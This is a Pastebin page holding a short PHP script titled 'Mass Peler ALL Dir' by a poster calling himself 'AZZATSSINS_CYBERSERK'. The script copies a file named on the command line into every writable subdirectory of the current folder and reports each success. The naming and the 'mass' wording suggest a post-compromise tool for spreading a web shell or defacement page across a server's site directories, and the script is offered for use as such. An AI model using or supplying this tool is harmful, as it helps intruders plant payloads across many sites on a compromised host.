Advertisement
AZZATSSINS_CYBERSERK

Mass Peler ALL Dir

Apr 19th, 2017
339
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.32 KB | None | 0 0
  1. <?php  
  2. /*
  3. AZZATSSINS / MASS ALL DIR
  4. Usage  : php file.php scriptmu.php
  5. */
  6. $a = scandir(getcwd());
  7. foreach($a as $aa){
  8. if($aa == "." | $aa == ".."){
  9. }elseif(is_dir(getcwd()."/".$aa)){
  10.  
  11. $azx = getcwd()."/".$aa;
  12. if(is_writable($azx)){
  13. echo $azx."/".$argv[1]." > Success\n";
  14. copy($argv[1],$azx."/".$argv[1]);
  15. }
  16. else{
  17. }}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement